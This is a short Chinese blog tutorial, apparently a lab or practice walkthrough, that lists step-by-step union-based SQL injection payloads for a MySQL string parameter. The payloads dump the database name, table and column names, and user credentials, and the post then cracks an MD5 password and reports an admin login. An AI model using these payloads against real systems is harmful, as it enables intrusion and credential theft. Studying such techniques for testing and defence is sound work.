本来是有图的,但是要上传太麻烦,有图点见我博客(在最下方有链接)
' %23判断注入点
' union select '1','2','3','4获取字段数,5开始报错,确定字段数为4
' and '1'='2' union select 判断可回显字段位置 ,是2和3
接下来获取数据库名 ' and '1'='2' union select '1',database(),user(),'字段
' and '1'='2' union select '1',group_concat(TABLE_NAME),'可回显字段倒数第二位','可回显字段倒数第一位' from information_schema.TABLES where TABLE_SCHEMA=database() and '1'='1 获取数据库中表名
' and '1'='2' union select '1',group_concat(COLUMN_NAME),'可回显字段倒数第二位','可回显字段最后一位' from information_schema.COLUMNS where TABLE_NAME='数据库表名' and '1'='1 获取字段名
' and '1'='2' union select '1',group_concat(字段名,字段名),'可回显字段倒数第二位','可回显字段最后一位' from 数据库表名 where '1'='1 获取用户名及密码
把md5加密过得密码进行解密
得出密码时083112
后台登录成功
转载请联系
详细看我博客
http://www.sakuar.cn/mysql-zifu/
本文原创,这个就是我博客里面的文章
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。